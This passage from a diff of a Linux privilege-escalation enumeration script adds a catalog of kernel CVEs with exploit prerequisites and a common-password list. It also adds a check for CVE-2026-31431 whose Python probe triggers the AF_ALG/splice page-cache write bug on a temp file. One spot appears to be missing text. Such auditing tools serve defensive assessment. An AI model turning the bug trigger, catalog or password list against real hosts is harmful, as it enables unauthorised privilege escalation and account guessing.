suggesters +CVE-2025-8045 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2025-8109 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +CVE-2106-2504 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters +EOF_DATA_20 +)" +KERNEL_CVE_DATA_21="$(cat <<'EOF_DATA_21' +CVE-2015-8550 double-fetch pkg=linux-kernel,ver=4.19.65 1 From kernel-exploit-factory detail section (test version Linux-4.19.65) +CVE-2017-8890 inet_csk_clone_lock double-free pkg=linux-kernel,ver=4.10.15 1 From kernel-exploit-factory detail section (test version Linux-4.10.15) +CVE-2019-8956 sctp_sendmsg null pointer dereference pkg=linux-kernel,ver=4.20.0,x86 1 From kernel-exploit-factory detail section; exploit chain is documented for 32-bit with CVE-2019-9213 +CVE-2021-31440 eBPF verifier __reg_combine_64_into_32 pkg=linux-kernel,ver>=5.11,ver<5.12,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1 1 From kernel-exploit-factory detail section and exploit prerequisites +CVE-2021-4154 cgroup fsconfig type confusion pkg=linux-kernel,ver=5.13.3 1 From kernel-exploit-factory detail section (test version Linux-5.13.3) +CVE-2022-2588 route4_filter double-free pkg=linux-kernel,ver=5.19.1,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 1 From kernel-exploit-factory detail section and exploit prerequisites +CVE-2022-2639 openvswitch reserve_sfa_size integer overflow pkg=linux-kernel,ver=5.17.4,cmd:grep -qi openvswitch /proc/modules 1 From kernel-exploit-factory detail section; openvswitch module required +CVE-2025-21702 net/sched qdisc UAF pkg=linux-kernel,ver=6.6.75,CONFIG_NET_SCHED=y 1 From kernel-exploit-factory detail section (test version Linux-6.6.75) +CVE-2017-16994 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; appears as related bypass mention +CVE-2020-27171 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; appears as related comment in exploit source +CVE-2024-0193 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; appears as upstream source reference +EOF_DATA_21 +)" + +TIP_DOCKER_ROOTLESS="In rootless mode privilege escalation to root will not be possible." + GREP_DOCKER_SOCK_INFOS="Architecture|OSType|Name|DockerRootDir|NCPU|OperatingSystem|KernelVersion|ServerVersion" GREP_DOCKER_SOCK_INFOS_IGNORE="IndexConfig" -TIP_DOCKER_ROOTLESS="In rootless mode privilege escalation to root will not be possible." - top2000pwds="123456 password 123456789 12345678 12345 qwerty 123123 111111 abc123 1234567 dragon 1q2w3e4r sunshine 654321 master 1234 football 1234567890 000000 computer 666666 superman michael internet iloveyou daniel 1qaz2wsx monkey shadow jessica letmein baseball whatever princess abcd1234 123321 starwars 121212 thomas zxcvbnm trustno1 killer welcome jordan aaaaaa 123qwe freedom password1 charlie batman jennifer 7777777 michelle diamond oliver mercedes benjamin 11111111 snoopy samantha victoria matrix george alexander secret cookie asdfgh 987654321 123abc orange fuckyou asdf1234 pepper hunter silver joshua banana 1q2w3e chelsea 1234qwer summer qwertyuiop phoenix andrew q1w2e3r4 elephant rainbow mustang merlin london garfield robert chocolate 112233 samsung qazwsx matthew buster jonathan ginger flower 555555 test caroline amanda maverick midnight martin junior 88888888 anthony jasmine creative patrick mickey 123 qwerty123 cocacola chicken passw0rd forever william nicole hello yellow nirvana justin friends cheese tigger mother liverpool blink182 asdfghjkl andrea spider scooter richard soccer rachel purple morgan melissa jackson arsenal 222222 qwe123 gabriel ferrari jasper danielle bandit angela scorpion prince maggie austin veronica nicholas monster dexter carlos thunder success hannah ashley 131313 stella brandon pokemon joseph asdfasdf 999999 metallica december chester taylor sophie samuel rabbit crystal barney xxxxxx steven ranger patricia christian asshole spiderman sandra hockey angels security parker heather 888888 victor harley 333333 system slipknot november jordan23 canada tennis qwertyui casper gemini asd123 winter hammer cooper america albert 777777 winner charles butterfly swordfish popcorn penguin dolphin carolina access 987654 hardcore corvette apples 12341234 sabrina remember qwer1234 edward dennis cherry sparky natasha arthur vanessa marina leonardo johnny dallas antonio winston \ snickers olivia nothing iceman destiny coffee apollo 696969 windows williams school madison dakota angelina anderson 159753 1111 yamaha trinity rebecca nathan guitar compaq 123123123 toyota shannon playboy peanut pakistan diablo abcdef maxwell golden asdasd 123654 murphy monica marlboro kimberly gateway bailey 00000000 snowball scooby nikita falcon august test123 sebastian panther love johnson godzilla genesis brandy adidas zxcvbn wizard porsche online hello123 fuckoff eagles champion bubbles boston smokey precious mercury lauren einstein cricket cameron angel admin napoleon mountain lovely friend flowers dolphins david chicago sierra knight yankees wilson warrior simple nelson muffin charlotte calvin spencer newyork florida fernando claudia basketball barcelona 87654321 willow stupid samson police paradise motorola manager jaguar jackie family doctor bullshit brooklyn tigers stephanie slayer peaches miller heaven elizabeth bulldog animal 789456 scorpio rosebud qwerty12 franklin claire american vincent testing pumpkin platinum louise kitten general united turtle marine icecream hacker darkness cristina colorado boomer alexandra steelers serenity please montana mitchell marcus lollipop jessie happy cowboy 102030 marshall jupiter jeremy gibson fucker barbara adrian 1qazxsw2 12344321 11111 startrek fishing digital christine business abcdefg nintendo genius 12qwaszx walker q1w2e3 player legend carmen booboo tomcat ronaldo people pamela marvin jackass google fender asdfghjk Password 1q2w3e4r5t zaq12wsx scotland phantom hercules fluffy explorer alexis walter trouble tester qwerty1 melanie manchester gordon firebird engineer azerty 147258 virginia tiger simpsons passion lakers james angelica 55555 vampire tiffany september private maximus loveme isabelle isabella eclipse dreamer changeme cassie badboy 123456a stanley sniper rocket passport pandora justice infinity cookies barbie xavier unicorn superstar \ stephen rangers orlando money domino courtney viking tucker travis scarface pavilion nicolas natalie gandalf freddy donald captain abcdefgh a1b2c3d4 speedy peter nissan loveyou harrison friday francis dancer 159357 101010 spitfire saturn nemesis little dreams catherine brother birthday 1111111 wolverine victory student france fantasy enigma copper bonnie teresa mexico guinness georgia california sweety logitech julian hotdog emmanuel butter beatles 11223344 tristan sydney spirit october mozart lolita ireland goldfish eminem douglas cowboys control cheyenne alex testtest stargate raiders microsoft diesel debbie danger chance asdf anything aaaaaaaa welcome1 qwert hahaha forest eternity disney denise carter alaska zzzzzz titanic shorty shelby pookie pantera england chris zachary westside tamara password123 pass maryjane lincoln willie teacher pierre michael1 leslie lawrence kristina kawasaki drowssap college blahblah babygirl avatar alicia regina qqqqqq poohbear miranda madonna florence sapphire norman hamilton greenday galaxy frankie black awesome suzuki spring qazwsxedc magnum lovers liberty gregory 232323 twilight timothy swimming super stardust sophia sharon robbie predator penelope michigan margaret jesus hawaii green brittany brenda badger a1b2c3 444444 winnie wesley voodoo skippy shithead redskins qwertyu pussycat houston horses gunner fireball donkey cherokee australia arizona 1234abcd skyline power perfect lovelove kermit kenneth katrina eugene christ thailand support special runner lasvegas jason fuckme butthead blizzard athena abigail 8675309 violet tweety spanky shamrock red123 rascal melody joanna hello1 driver bluebird biteme atlantis arnold apple alison taurus random pirate monitor maria lizard kevin hummer holland buffalo 147258369 007007 valentine roberto potter magnolia juventus indigo indian harvey duncan diamonds daniela christopher bradley bananas warcraft sunset simone renegade \ @@ -1168,14 +1785,641 @@ fi # Functions +cf31_num() { + printf '%s\n' "$1" | sed 's/[^0-9].*$//; s/^0*//; s/^$/0/' +} +cf31_is_fixed_upstream_release() { + if [ "$CF31_MAJ" -ge 7 ]; then + return 0 + fi + if [ "$CF31_MAJ" -eq 6 ]; then + case "$CF31_MIN" in + 19) [ "$CF31_PAT" -ge 12 ] && return 0 ;; + 18) [ "$CF31_PAT" -ge 22 ] && return 0 ;; + 12) [ "$CF31_PAT" -ge 85 ] && return 0 ;; + 6) [ "$CF31_PAT" -ge 137 ] && return 0 ;; + 1) [ "$CF31_PAT" -ge 170 ] && return 0 ;; + esac + elif [ "$CF31_MAJ" -eq 5 ]; then + case "$CF31_MIN" in + 15) [ "$CF31_PAT" -ge 204 ] && return 0 ;; + 10) [ "$CF31_PAT" -ge 254 ] && return 0 ;; + esac + fi + return 1 +} +cf31_py_can_run_probe() { + CF31_PY="$1" + if command -v timeout >/dev/null 2>&1; then + timeout "$CF31_PY_TIMEOUT" "$CF31_PY" -c 'import ctypes, os, sys +try: + if hasattr(os, "splice"): + sys.exit(0) + libc = ctypes.CDLL(None, use_errno=True) + sys.exit(0 if hasattr(libc, "splice") else 1) +except Exception: + sys.exit(1) +' >/dev/null 2>&1 + else + "$CF31_PY" -c 'import ctypes, os, sys +try: + if hasattr(os, "splice"): + sys.exit(0) + libc = ctypes.CDLL(None, use_errno=True) + sys.exit(0 if hasattr(libc, "splice") else 1) +except Exception: + sys.exit(1) +' >/dev/null 2>&1 + fi +} +cf31_run_python_probe() { + CF31_PY="$1" + CF31_TMP_PY=/tmp/cf31-probe-$$.py + cat > "$CF31_TMP_PY" <<'PY' +import errno, os, signal, socket, struct, sys, tempfile, shutil +try: + signal.signal(signal.SIGALRM, lambda *_: (_ for _ in ()).throw(TimeoutError("probe timeout"))) + signal.alarm(10) +except Exception: + pass +AF_ALG=38 +SOCK_SEQPACKET=5 +SOL_ALG=279 +ALG_SET_KEY=1 +ALG_SET_IV=2 +ALG_SET_OP=3 +ALG_SET_AEAD_ASSOCLEN=4 +ALG_SET_AEAD_AUTHSIZE=5 +ALG_OP_DECRYPT=0 +ALG="authencesn(hmac(sha256),cbc(aes))" +PAGE=4096 +TARGET_OFF=16 +MARK=b"CF31" +def out(msg, code): + print(msg, flush=True) + raise SystemExit(code) +def build_splice(): + if hasattr(os, "splice"): + def _splice(fd_in, fd_out, length, offset_src=None, offset_dst=None): + return os.splice(fd_in, fd_out, length, offset_src=offset_src, offset_dst=offset_dst) + return _splice + try: + import ctypes + libc=ctypes.CDLL(None, use_errno=True) + splice_fn=libc.splice + off_t=ctypes.c_longlong + splice_fn.argtypes=[ctypes.c_int, ctypes.POINTER(off_t), ctypes.c_int, ctypes.POINTER(off_t), ctypes.c_size_t, ctypes.c_uint] + splice_fn.restype=ctypes.c_ssize_t + except Exception as e: + out("PYTHON_UNUSABLE: splice helper is not available (%s)" % e, 1) + def _splice(fd_in, fd_out, length, offset_src=None, offset_dst=None): + in_off=off_t(offset_src) if offset_src is not None else None + out_off=off_t(offset_dst) if offset_dst is not None else None + n=splice_fn( + fd_in, + ctypes.byref(in_off) if in_off is not None else None, + fd_out, + ctypes.byref(out_off) if out_off is not None else None, + length, + 0, + ) + if n < 0: + err=ctypes.get_errno() + raise OSError(err, os.strerror(err)) + return n + return _splice +SPLICE=build_splice() +fd=rfd=wfd=None +op=master=None +td=None +try: + try: + master=socket.socket(AF_ALG, SOCK_SEQPACKET, 0) + master.bind(("aead", ALG)) + except OSError as e: + out("NOT VULNERABLE: AF_ALG/authencesn is not reachable from this context (%s)" % (e.strerror or e), 0) + master.setsockopt(SOL_ALG, ALG_SET_KEY, bytes.fromhex("0800010000000010" + "00"*32)) + master.setsockopt(SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, 4) + op,_=master.accept() + try: + op.settimeout(3.0) + except Exception: + pass + td=tempfile.mkdtemp(prefix="cf31-check-") + path=os.path.join(td, "sentinel") + baseline=b"A"*PAGE + with open(path, "wb") as f: + f.write(baseline) + fd=os.open(path, os.O_RDONLY) + os.read(fd, PAGE) + os.lseek(fd, 0, 0) + cmsgs=[ + (SOL_ALG, ALG_SET_OP, struct.pack("I", ALG_OP_DECRYPT)), + (SOL_ALG, ALG_SET_IV, struct.pack("I",16)+b"\x00"*16), + (SOL_ALG, ALG_SET_AEAD_ASSOCLEN, struct.pack("I",8)), + ] + op.sendmsg([b"AAAA"+MARK], cmsgs, socket.MSG_MORE) + rfd,wfd=os.pipe() + splice_len=TARGET_OFF+len(MARK) + n=SPLICE(fd, wfd, splice_len, offset_src=0) + if n != splice_len: + out("UNKNOWN: short splice file->pipe (%d/%d)" % (n, splice_len), 1) + n2=SPLICE(rfd, op.fileno(), splice_len) + if n2 != splice_len: + out("UNKNOWN: short splice pipe->AF_ALG (%d/%d)" % (n2, splice_len), 1) + try: + op.recv(64) + except OSError as e: + if e.errno not in (errno.EBADMSG, errno.EINVAL): + raise + except TimeoutError: + out("PYTHON_PROBE_UNKNOWN: recv timed out", 1) + os.lseek(fd, 0, 0) + after=os.read(fd, PAGE) + if after[TARGET_OFF:TARGET_OFF+len(MARK)] == MARK: + out("VULNERABLE: non-destructive AF_ALG/splice page-cache write triggered", 2) + if after != baseline: + out("VULNERABLE: temp-file page cache changed unexpectedly", 2) + out("NOT VULNERABLE: Python runtime probe left temp-file page cache intact", 0) +except SystemExit: + raise +except Exception as e: + out("PYTHON_PROBE_UNKNOWN: %s: %s" % (type(e).__name__, e), 1) +finally: + try: + signal.alarm(0) + except Exception: + pass + for x in (fd,rfd,wfd): + try: + if x is not None: + os.close(x) + except Exception: + pass + for s in (op,master): + try: + if s is not None: + s.close() + except Exception: + pass + try: + if td: + shutil.rmtree(td) + except Exception: + pass +PY + [ -s "$CF31_TMP_PY" ] || return 1 + if command -v timeout >/dev/null 2>&1; then + timeout "$CF31_PY_TIMEOUT" "$CF31_PY" "$CF31_TMP_PY" + else + "$CF31_PY" "$CF31_TMP_PY" + fi +} +checkCopyFail() { + ( + CF31_PY_TIMEOUT=12 + CF31_TMP_PY="" + trap '[ -n "$CF31_TMP_PY" ] && rm -f "$CF31_TMP_PY"' EXIT HUP INT TERM + CF31_KERNEL_OS=$(uname -s 2>/dev/null || echo unknown) + if [ "$CF31_KERNEL_OS" != "Linux" ]; then + echo "NOT APPLICABLE: Copy Fail (CVE-2026-31431) affects Linux kernels only." | sed -${E} "s,.*,${SED_GREEN}," + exit 0 + fi + for CF31_CANDIDATE in python3 python; do + if command -v "$CF31_CANDIDATE" >/dev/null 2>&1 && cf31_py_can_run_probe "$CF31_CANDIDATE"; then + CF31_MSG=$(cf31_run_python_probe "$CF31_CANDIDATE") + CF31_RC=$? + case "$CF31_RC" in + 0) + printf "%s\n" "$CF31_MSG" | sed -${E} "s,.*,${SED_GREEN}," + exit 0 + ;; + 2) + printf "%s\n" "$CF31_MSG" | sed -${E} "s,.*,${SED_RED_YELLOW}," + exit 2 + ;; + 1) + [ -n "$CF31_MSG" ] && printf "%s\n" "$CF31_MSG" | sed -${E} "s,.*,${SED_RED_YELLOW}," + ;; + esac + echo "Python probe inconclusive; falling back to POSIX sh triage." + break + fi + done + CF31_KERNEL_RELEASE=$(uname -r 2>/dev/null || echo unknown) + CF31_KV=$(printf '%s\n' "$CF31_KERNEL_RELEASE" | sed 's/^[^0-9]*//; s/[^0-9.].*$//') + CF31_KERNEL_VERSION="$CF31_KV" + set -- $(printf '%s\n' "$CF31_KV" | tr '.' ' ') + CF31_MAJ=$(cf31_num "${1:-0}") + CF31_MIN=$(cf31_num "${2:-0}") + CF31_PAT=$(cf31_num "${3:-0}") + CF31_API=unknown + CF31_CFG='' + for CF31_CFG_FILE in /proc/config.gz /boot/config-"$CF31_KERNEL_RELEASE" /lib/modules/"$CF31_KERNEL_RELEASE"/config; do + [ -r "$CF31_CFG_FILE" ] || continue + case "$CF31_CFG_FILE" in + *.gz) + if command -v gzip >/dev/null 2>&1; then + CF31_CFG_LINE=$(gzip -cd "$CF31_CFG_FILE" 2>/dev/null | grep -E '^(# )?CONFIG_CRYPTO_USER_API_AEAD(=| is not set)' | tail -n 1) + else + CF31_CFG_LINE='' + fi + ;; + *) + CF31_CFG_LINE=$(grep -E '^(# )?CONFIG_CRYPTO_USER_API_AEAD(=| is not set)' "$CF31_CFG_FILE" 2>/dev/null | tail -n 1) + ;; + esac + [ -n "$CF31_CFG_LINE" ] && CF31_CFG=$CF31_CFG_LINE + done + case "$CF31_CFG" in + *'is not set'*) CF31_API=off ;; + *=y) CF31_API=builtin ;; + *=m) CF31_API=module ;; + esac + if [ "$CF31_API" = unknown ]; then + if [ -e /sys/module/algif_aead ]; then + CF31_API=loaded + elif command -v modinfo >/dev/null 2>&1 && modinfo algif_aead >/dev/null 2>&1; then + CF31_API=module + elif find /lib/modules/"$CF31_KERNEL_RELEASE" -name 'algif_aead.ko*' -print 2>/dev/null | grep -q .; then + CF31_API=module + elif [ -r /proc/crypto ] && grep -q 'authencesn(hmac(sha256),cbc(aes))' /proc/crypto 2>/dev/null; then + CF31_API=reachable + fi + fi + if [ "$CF31_API" = off ]; then + echo "NOT VULNERABLE: CONFIG_CRYPTO_USER_API_AEAD is disabled." | sed -${E} "s,.*,${SED_GREEN}," + exit 0 + fi + CF31_BLOCKED=no + for CF31_CFG_FILE in /etc/modprobe.d/*.conf /lib/modprobe.d/*.conf /usr/lib/modprobe.d/*.conf; do + [ -f "$CF31_CFG_FILE" ] || continue + if grep -Eq '^[[:space:]]*install[[:space:]]+algif_aead[[:space:]]+(/usr)?/bin/(false|true)([[:space:]]|$)' "$CF31_CFG_FILE" 2>/dev/null; then + CF31_BLOCKED=yes + fi + done + if [ "$CF31_API" = module ] && [ "$CF31_BLOCKED" = yes ] && [ ! -e /sys/module/algif_aead ]; then + echo "NOT VULNERABLE: algif_aead autoload is blocked and the module is not loaded." | sed -${E} "s,.*,${SED_GREEN}," + exit 0 + fi + if [ -r /proc/cmdline ] && grep -q 'initcall_blacklist=algif_aead_init' /proc/cmdline 2>/dev/null; then + echo "LIKELY NOT VULNERABLE: kernel booted with initcall_blacklist=algif_aead_init." | sed -${E} "s,.*,${SED_GREEN}," + exit 0 + fi + CF31_FIXED_PKG=no + if command -v dpkg-query >/dev/null 2>&1; then + CF31_PKG=$(dpkg-query -S "/boot/vmlinuz-$CF31_KERNEL_RELEASE" 2>/dev/null | sed 's/:.*//' | sed -n '1p') + if [ -n "$CF31_PKG" ]; then + for CF31_CFG_FILE in /usr/share/doc/"$CF31_PKG"/changelog*; do + [ -f "$CF31_CFG_FILE" ] || continue + case "$CF31_CFG_FILE" in + *.gz) command -v gzip >/dev/null 2>&1 && gzip -cd "$CF31_CFG_FILE" 2>/dev/null ;; + *) cat "$CF31_CFG_FILE" 2>/dev/null ;; + esac + done | grep -Eiq 'CVE-2026-31431|a664bf3d603d|ce42ee423e58|fafe0fa2995a|algif_aead.*out-of-place|Revert to operating out-of-place' && CF31_FIXED_PKG=yes + fi + fi + if [ "$CF31_FIXED_PKG" = no ] && command -v rpm >/dev/null 2>&1; then + CF31_PKG=$(rpm -q --whatprovides "kernel-uname-r = $CF31_KERNEL_RELEASE" 2>/dev/null | sed -n '1p') + case "$CF31_PKG" in + ''|no\ package*) ;; + *) + rpm -q --changelog "$CF31_PKG" 2>/dev/null | + grep -Eiq 'CVE-2026-31431|a664bf3d603d|ce42ee423e58|fafe0fa2995a|algif_aead.*out-of-place|Revert to operating out-of-place' && CF31_FIXED_PKG=yes + ;; + esac + fi + if [ "$CF31_FIXED_PKG" = yes ]; then + echo "LIKELY NOT VULNERABLE: running kernel package changelog mentions the CVE-2026-31431 fix." | sed -${E} "s,.*,${SED_GREEN}," + exit 0 + fi + if [ "$CF31_MAJ" -lt 4 ] || { [ "$CF31_MAJ" -eq 4 ] && [ "$CF31_MIN" -lt 14 ]; }; then + echo "NOT VULNERABLE for upstream kernel version: $CF31_KERNEL_RELEASE predates the vulnerable upstream commit." | sed -${E} "s,.*,${SED_GREEN}," + exit 0 + fi + if cf31_is_fixed_upstream_release; then + echo "LIKELY NOT VULNERABLE for upstream kernel version: $CF31_KERNEL_RELEASE is at/after a fixed upstream release." | sed -${E} "s,.*,${SED_GREEN}," + exit 0 + fi + if [ "$CF31_API" = unknown ]; then + echo "UNKNOWN: $CF31_KERNEL_RELEASE is in the affected upstream range, but AEAD user API exposure could not be verified." | sed -${E} "s,.*,${SED_RED_YELLOW}," + exit 1 + fi + echo "LIKELY VULNERABLE: $CF31_KERNEL_RELEASE is in the affected upstream range and AEAD user API appears $CF31_API." | sed -${E} "s,.*,${SED_RED_YELLOW}," + exit 2 + ) +} + +print_list(){ + printf ${BLUE}"═╣ $GREEN$1"$NC #There is 1 "═" +} + echo_not_found(){ printf $DG"$1 Not Found\n"$NC } +KERNEL_CVE_EXPL="" +KERNEL_CVE_ALT="" +KERNEL_CVE_MIL="" +kercve_norm_ver() { + printf "%s" "$1" | tr '-' '.' | sed 's/[^0-9.].*$//' | sed 's/\.\./\./g' | sed 's/^\.//' | sed 's/\.$//' +} +kercve_ver_cmp() { + KERNEL_CVE_CURVER=$(kercve_norm_ver "$1") + KERNEL_CVE_REQVER=$(kercve_norm_ver "$3") + KERNEL_CVE_OP="$2" + [ -z "$KERNEL_CVE_CURVER" ] && return 1 + [ -z "$KERNEL_CVE_REQVER" ] && return 1 + KERNEL_CVE_CMP=$(awk -v a="$KERNEL_CVE_CURVER" -v b="$KERNEL_CVE_REQVER" ' + function clean(v){gsub(/[^0-9]/,"",v); if(v=="")v=0; return v+0} + BEGIN{ + na=split(a,A,"."); nb=split(b,B,"."); n=(na>nb?na:nb); + for(i=1;i<=n;i++){ + va=(i<=na?clean(A[i]):0); vb=(i<=nb?clean(B[i]):0); + if(vavb){print 1; exit} + } + print 0 + }') + case "$KERNEL_CVE_OP" in + '=') [ "$KERNEL_CVE_CMP" -eq 0 ] ;; + '>') [ "$KERNEL_CVE_CMP" -gt 0 ] ;; + '<') [ "$KERNEL_CVE_CMP" -lt 0 ] ;; + '>=') [ "$KERNEL_CVE_CMP" -ge 0 ] ;; + '<=') [ "$KERNEL_CVE_CMP" -le 0 ] ;; + *) return 1 ;; + esac +} +kercve_get_cfg_line() { + KERNEL_CVE_CFG_KEY="$1" + if [ -z "$KERNEL_CVE_CFG_SOURCE" ] || ! [ -r "$KERNEL_CVE_CFG_SOURCE" ]; then + return 1 + fi + if printf "%s" "$KERNEL_CVE_CFG_SOURCE" | grep -q '\\.gz$'; then + KERNEL_CVE_CFG_LINE=$(gzip -dc "$KERNEL_CVE_CFG_SOURCE" 2>/dev/null | grep -E "^(${KERNEL_CVE_CFG_KEY}=|# ${KERNEL_CVE_CFG_KEY} is not set)" | head -n1) + else + KERNEL_CVE_CFG_LINE=$(grep -E "^(${KERNEL_CVE_CFG_KEY}=|# ${KERNEL_CVE_CFG_KEY} is not set)" "$KERNEL_CVE_CFG_SOURCE" 2>/dev/null | head -n1) + fi + [ -n "$KERNEL_CVE_CFG_LINE" ] +} +kercve_eval_config_req() { + KERNEL_CVE_CFG_EXPR="$1" + [ -z "$KERNEL_CVE_CFG_SOURCE" ] && return 0 + if printf "%s" "$KERNEL_CVE_CFG_EXPR" | grep -q '!='; then + KERNEL_CVE_CFG_OP='!=' + KERNEL_CVE_CFG_KEY=$(printf "%s" "$KERNEL_CVE_CFG_EXPR" | awk -F'!=' '{print $1}') + KERNEL_CVE_CFG_EXPECT=$(printf "%s" "$KERNEL_CVE_CFG_EXPR" | awk -F'!=' '{print $2}') + elif printf "%s" "$KERNEL_CVE_CFG_EXPR" | grep -q '='; then + KERNEL_CVE_CFG_OP='=' + KERNEL_CVE_CFG_KEY=$(printf "%s" "$KERNEL_CVE_CFG_EXPR" | awk -F'=' '{print $1}') + KERNEL_CVE_CFG_EXPECT=$(printf "%s" "$KERNEL_CVE_CFG_EXPR" | awk -F'=' '{print $2}') + else + KERNEL_CVE_CFG_OP='present' + KERNEL_CVE_CFG_KEY="$KERNEL_CVE_CFG_EXPR" + KERNEL_CVE_CFG_EXPECT='[my]' + fi + if ! kercve_get_cfg_line "$KERNEL_CVE_CFG_KEY"; then + return 0 + fi + if printf "%s" "$KERNEL_CVE_CFG_LINE" | grep -q '# .* is not set'; then + KERNEL_CVE_CFG_CUR='n' + else + KERNEL_CVE_CFG_CUR=$(printf "%s" "$KERNEL_CVE_CFG_LINE" | awk -F'=' '{print $2}') + fi + if [ "$KERNEL_CVE_CFG_OP" = '!=' ]; then + if printf "%s" "$KERNEL_CVE_CFG_EXPECT" | grep -q '\\[my\\]'; then + ! printf "%s" "$KERNEL_CVE_CFG_CUR" | grep -Eq '^[my]$' + else + [ "$KERNEL_CVE_CFG_CUR" != "$KERNEL_CVE_CFG_EXPECT" ] + fi + return + fi + if printf "%s" "$KERNEL_CVE_CFG_EXPECT" | grep -q '\\[my\\]'; then + printf "%s" "$KERNEL_CVE_CFG_CUR" | grep -Eq '^[my]$' + return + fi + [ "$KERNEL_CVE_CFG_CUR" = "$KERNEL_CVE_CFG_EXPECT" ] +} +kercve_eval_sysctl_req() { + KERNEL_CVE_SYS_EXPR="$1" + if printf "%s" "$KERNEL_CVE_SYS_EXPR" | grep -q '!='; then + KERNEL_CVE_SYS_OP='!=' + KERNEL_CVE_SYS_KEY=$(printf "%s" "$KERNEL_CVE_SYS_EXPR" | awk -F'!=' '{print $1}') + KERNEL_CVE_SYS_VAL=$(printf "%s" "$KERNEL_CVE_SYS_EXPR" | awk -F'!=' '{print $2}') + elif printf "%s" "$KERNEL_CVE_SYS_EXPR" | grep -q '=='; then + KERNEL_CVE_SYS_OP='==' + KERNEL_CVE_SYS_KEY=$(printf "%s" "$KERNEL_CVE_SYS_EXPR" | awk -F'==' '{print $1}') + KERNEL_CVE_SYS_VAL=$(printf "%s" "$KERNEL_CVE_SYS_EXPR" | awk -F'==' '{print $2}') + else + return 1 + fi + KERNEL_CVE_SYS_CUR=$(sysctl -n "$KERNEL_CVE_SYS_KEY" 2>/dev/null) + [ -z "$KERNEL_CVE_SYS_CUR" ] && return 0 + if [ "$KERNEL_CVE_SYS_OP" = '==' ]; then + [ "$KERNEL_CVE_SYS_CUR" = "$KERNEL_CVE_SYS_VAL" ] + else + [ "$KERNEL_CVE_SYS_CUR" != "$KERNEL_CVE_SYS_VAL" ] + fi +} +kercve_eval_req_token() { + KERNEL_CVE_REQ="$1" + [ -z "$KERNEL_CVE_REQ" ] && return 0 + if printf "%s" "$KERNEL_CVE_REQ" | grep -q '^pkg='; then + [ "$KERNEL_CVE_REQ" = 'pkg=linux-kernel' ] + return + fi + if printf "%s" "$KERNEL_CVE_REQ" | grep -q '^ver'; then + KERNEL_CVE_OP=$(printf "%s" "$KERNEL_CVE_REQ" | sed -E 's/^ver(<=|>=|=|<|>).*/\1/') + KERNEL_CVE_VER=$(printf "%s" "$KERNEL_CVE_REQ" | sed -E 's/^ver(<=|>=|=|<|>)//') + kercve_ver_cmp "$KERNEL_CVE_KERNEL_VERSION" "$KERNEL_CVE_OP" "$KERNEL_CVE_VER" + return + fi + if [ "$KERNEL_CVE_REQ" = 'x86_64' ]; then + [ "$KERNEL_CVE_KERNEL_ARCH" = 'x86_64' ] + return + fi + if [ "$KERNEL_CVE_REQ" = 'x86' ]; then + [ "$KERNEL_CVE_KERNEL_ARCH" = 'i386' ] || [ "$KERNEL_CVE_KERNEL_ARCH" = 'i686' ] || [ "$KERNEL_CVE_KERNEL_ARCH" = 'x86' ] + return + fi + if printf "%s" "$KERNEL_CVE_REQ" | grep -q '^CONFIG_'; then + kercve_eval_config_req "$KERNEL_CVE_REQ" + return + fi + if printf "%s" "$KERNEL_CVE_REQ" | grep -q '^sysctl:'; then + kercve_eval_sysctl_req "${KERNEL_CVE_REQ#sysctl:}" + return + fi + if printf "%s" "$KERNEL_CVE_REQ" | grep -q '^cmd:'; then + eval "${KERNEL_CVE_REQ#cmd:}" >/dev/null 2>&1 + return + fi + return 1 +} +kercve_match_version_list() { + KERNEL_CVE_VERS="$1" + KERNEL_CVE_VER_LINES=$(printf "%s" "$KERNEL_CVE_VERS" | tr ',' '\n') + while IFS= read -r KERNEL_CVE_VER; do + KERNEL_CVE_VER=$(printf "%s" "$KERNEL_CVE_VER" | sed 's/^ *//;s/ *$//') + [ -z "$KERNEL_CVE_VER" ] && continue + if printf "%s" "$KERNEL_CVE_KERNEL_VERSION" | grep -Eq "^${KERNEL_CVE_VER}(\\.|-|$)"; then + return 0 + fi + done </dev/null) + KERNEL_CVE_KERNEL_RELEASE=$(uname -r 2>/dev/null) + KERNEL_CVE_KERNEL_VERSION=$(kercve_norm_ver "$KERNEL_CVE_KERNEL_RELEASE") + KERNEL_CVE_KERNEL_ARCH=$(uname -m 2>/dev/null) + KERNEL_CVE_CFG_SOURCE="" + for KERNEL_CVE_CFG_FILE in "/proc/config.gz" "/boot/config-$KERNEL_CVE_KERNEL_RELEASE" "/lib/modules/$KERNEL_CVE_KERNEL_RELEASE/build/.config" "/usr/lib/modules/$KERNEL_CVE_KERNEL_RELEASE/build/.config" "/usr/src/linux/.config"; do + if [ -r "$KERNEL_CVE_CFG_FILE" ]; then + KERNEL_CVE_CFG_SOURCE="$KERNEL_CVE_CFG_FILE" + break + fi + done + KERNEL_CVE_ALL_DATA=$(printf "%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s\n%s" \ + "$KERNEL_CVE_DATA_1" "$KERNEL_CVE_DATA_2" "$KERNEL_CVE_DATA_3" "$KERNEL_CVE_DATA_4" "$KERNEL_CVE_DATA_5" \ + "$KERNEL_CVE_DATA_6" "$KERNEL_CVE_DATA_7" "$KERNEL_CVE_DATA_8" "$KERNEL_CVE_DATA_9" "$KERNEL_CVE_DATA_10" \ + "$KERNEL_CVE_DATA_11" "$KERNEL_CVE_DATA_12" "$KERNEL_CVE_DATA_13" "$KERNEL_CVE_DATA_14" "$KERNEL_CVE_DATA_15" \ + "$KERNEL_CVE_DATA_16" "$KERNEL_CVE_DATA_17" "$KERNEL_CVE_DATA_18" "$KERNEL_CVE_DATA_19" "$KERNEL_CVE_DATA_20" \ + "$KERNEL_CVE_DATA_21") + print_list "Operating system ............. $KERNEL_CVE_KERNEL_OS\n" + print_list "Kernel release ............... $KERNEL_CVE_KERNEL_RELEASE\n" + print_list "Comparable version ........... 